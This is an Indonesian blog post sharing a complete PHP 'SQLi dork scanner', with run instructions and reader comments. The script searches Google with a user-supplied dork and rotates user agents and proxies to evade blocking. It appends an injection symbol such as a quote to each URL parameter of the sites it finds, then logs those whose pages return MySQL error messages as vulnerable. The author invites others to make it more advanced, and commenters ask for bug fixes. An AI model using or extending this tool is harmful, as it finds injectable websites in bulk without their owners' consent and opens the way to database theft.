403 Forbidden

Selasa, 28 Mei 2013

Simple Sqli Dork Scanner

ijin share dork scan punya ane
mohon dikembangkan lagi gan

<?php
//Coded by RieqyNS13
//Greeting to Allah swt and all devilzc0de.org members
class rieqyns13{
    public $dork;
    public $jumlah;
    public $key;
    public $simpan;
 public $hapus_yg_sama;
 public $proxy;
 public $proxy_file;
    private $useragent = array(
        'Mozilla/5.0 (X11; Linux i686) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5',
        'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11',
        'Opera/9.25 (Windows NT 5.1; U; en)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
        'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.12) Gecko/20070731 Ubuntu/dapper-security Firefox/1.5.0.12',
        'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:50',
        'Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+2011-10-16 20:21:10',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0',
        'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6'
    );
    function match($start, $end, $var){
        return preg_match_all("|".preg_quote($start).'(.*?)'.preg_quote($end)."|", $var, $m) ? $m[1] : null;
    }
    function graph($dork=null, $x, $url=null){
        $ch = curl_init();
        if($dork != null && is_numeric($x)){
            curl_setopt($ch, CURLOPT_URL, "http://www.google.com/search?q=".urlencode($dork)."&amp;ie=UTF-8&start=".urlencode($x));
        }elseif($url != null && $x==null){
            curl_setopt($ch, CURLOPT_URL, $url);
        }
  if($this->proxy==true){
   curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, false);
   curl_setopt($ch, CURLOPT_PROXY, $this->proxy());
  }
        curl_setopt($ch, CURLOPT_USERAGENT, array_rand($this->useragent));
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_AUTOREFERER, true );
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);
        $exec = curl_exec($ch);
        curl_close($ch);
        return $exec;
    }
 function proxy(){
  if(@is_file($this->proxy_file)){
   $file = file($this->proxy_file);
   return str_replace(array("\n", "\r", "\r\n"), "", $file[array_rand($file)]);
  }else return "tidak ada file {$this->proxy_file}, tolong buat dulu";
 }
    function parse($url){
        $this->key = str_replace(array("\n", "\r", "\r\n"), "", $this->key);
        $arr = parse_url($url);
        if(empty($arr['query'])){
            return $url;
        }    
        parse_str($arr['query'], $ar);
        $key = array_keys($ar);
        foreach($key as $a){
            $x[] = $a."=".$ar[$a].$this->key;
            }
        $imp = implode("&", $x);
        return $arr['scheme']."://".$arr['host'].$arr['path']."?".$imp;
    }
    function simpan($url){
        $fp = fopen($this->simpan, "a");
        fwrite($fp, $url."\n");
        fclose($fp);
    }
 function cekurls($urls){
  $urlv = null;
  if($this->hapus_yg_sama==false) return $urls;
  elseif($this->hapus_yg_sama==true){
   for($a=0; $a<count($urls); $a++){
    $dev = parse_url($urls[$a]);
    @$scheme[] = $dev['scheme'];
    @$host[] = $dev['host'];
    if(empty($dev['path'])) $path[] = null;
    elseif(!empty($dev['path'])) $path[] = $dev['path'];
    if(empty($dev['query'])) $prm[] = null;
    elseif(!empty($dev['query'])) $prm[] = $dev['query'];
   }
   if(isset($host)){
   $unik = array_unique($host);
   foreach($unik as $key=>$url){
    if(!empty($prm[$key])){
     $prm = "?".$prm[$key];
    }elseif(empty($prm[$key])) $prm = null;
    $urlv[] = $scheme[$key]."://".$url.$path[$key].$prm;
   }
   return $urlv;
   }elseif(!isset($host) && $this->proxy==false) echo "[Error] ";
   elseif(!isset($host) && $this->proxy==true) echo "[Proxy mungkin tidak valid] ";
  }
 }
    function scandork(){
        $dork = $this->dork;
        $dork = str_replace(array("\n", "\r", "\r\n"), "", $dork);
        $start=0;
        $jumlah=0;
        $page=0;
  $total=0;
        while($jumlah<=$this->jumlah){
            $a=0;
            $graph = $this->graph($dork, $start, null);
            $match = $this->match('<h3 class="r"><a href="/url?q=', '&amp;sa=U&amp;', $graph);
   $cekurls = $this->cekurls($match);
            if(count($cekurls)==0){
                echo "hasil tidak ada atau ada halangan captcha :p\n";
                continue;
            }
            $mulai = time();
            foreach($cekurls as $url){
                $urlp = $this->parse(urldecode($url));
                $graph = $this->graph(null, null, $urlp);
                if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph)){
                    echo "vuln -> ".urldecode($urlp)."\n";
                    $this->simpan($urlp);
                    $a++;
                }else{
                    echo "NOT vuln - > ".urldecode($urlp)."\n";
                }
                $jumlah++;
            }
            $selang = time() - $mulai;
            $detik = round($selang);
            $menit = round($selang / 60);
            $jam = round($selang / 3600);
   $start=$start+count($cekurls);
            $page++;
            echo "Selesai scan page {$page} dalam : {$jam} jam {$menit} menit {$detik} detik\n\n";
        }
        echo "Jumlah situs yang discan {$jumlah}\n";
        
    }
    
}
echo "simple dork scanner by rieqyns13\n\n";
$dc = new rieqyns13;
echo "Masukkan dork = ";
$fp = fopen("php://stdin", "rb"); //dorknya
$str = fgets($fp);
echo "Masukkan simbol/key = "; //simbol yg disisipkan pada url
$key = fgets($fp);
fclose($fp);
///OPTION///////////////////////////////////
$dc->hapus_yg_sama = true; //isi true jika ingin menghapus url yg sama dalam setiap page, false jika tidak
$dc->proxy = true; //true jika ingin menggunakan proxy yg ada di $dc->proxy_file, atau false jika tidak ingin menggunakan proxy
$dc->proxy_file = "proxylist.txt"; //digunakan jika $dc->proxy=true, setiap proxy yg ada di dalam file harus menggunakan susunan -> proxy:port . contoh "914.143.141.131:8080"
$dc->jumlah = 300; //jumlah situs yg discan
////////////////////////////////////////////
$dc->dork = $str;
$dc->key = $key;
$dc->simpan = "url_vuln.txt";
$dc->scandork();
?>
copas ke notepad trus simpan dgn extensi php, trus buka cmd, masuk ke path dmana taruh file php tadi, trus jalanin pke printah php scan.php, dgn syarat path nya harus udah ditambahin/diatur ke c:\xampp\php


dan ini gambar jika menggunakan proxy
tuh berarti proxy yg dipke harus bener2 FRESH dan tahan lama, jika tidak, maka beberapa url atau bahkan semua url tidak bisa digraph.
skarang penjelasan selanjutnya.
tuh konsep dari dork scanner ane,  jika url ada parameter tertentu kya gini misal:
http://site.com/detail.php?id=2&next.asp?cat=21&gay.cfm?id=null
ntar dirubah ke
http://site.com/detail.php?id=2'&next_asp?cat=21'&gay_cfm?id=null'

sesuai dengan simbol yg dimasukkan.
jika url tidak ada parameter kya di atas, akan direturn ke url aslinya
ane cuman bisa nangkep site vuln berdasarkan pesan sql error pda umunya gan, jadi site keluar gak terlalu banyak. ni gan buat ngecek apakah tuh site vuln ato kagak
if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph))
pngalam ane klo keseringan pke dork yg kompleks, biasanya diblock ama captcha gan
mohon dikembangin lagi biar bisa menjadi tool yg advanced gan

5 comments

bisa kasih tutor yang detil gan, masih bingung nih, udah simpan .php , pas di cmd commandnya gimana?

klo udah nginstall xampp, di cmd tulis kya gini:

c:\xampp\php\php.exe file.php

saya save dg nama index.php di c:\xampp\htdocs\

di cmd saya ketik c:\xampp\htdocs\php.exe index.php

tidak bisa apa yg salah ya gan

error yg muncul apa emang ??
curl_init() bla bla bla ??

Hey bro, found you on hf. First of all great work on your simple sqli scanner and happy festive season and sorry to bother you. But it seems that the input captcha is broken probably due to some google update. I am no longer able to view or enter it due to some script error.
Also for some reason, it is unable to detect vulnerable asp sqli errors even the most obvious ones. Any chance you can update and fix the bugs? Your efforts are really appreciated :) and keep up the great work.


EmoticonEmoticon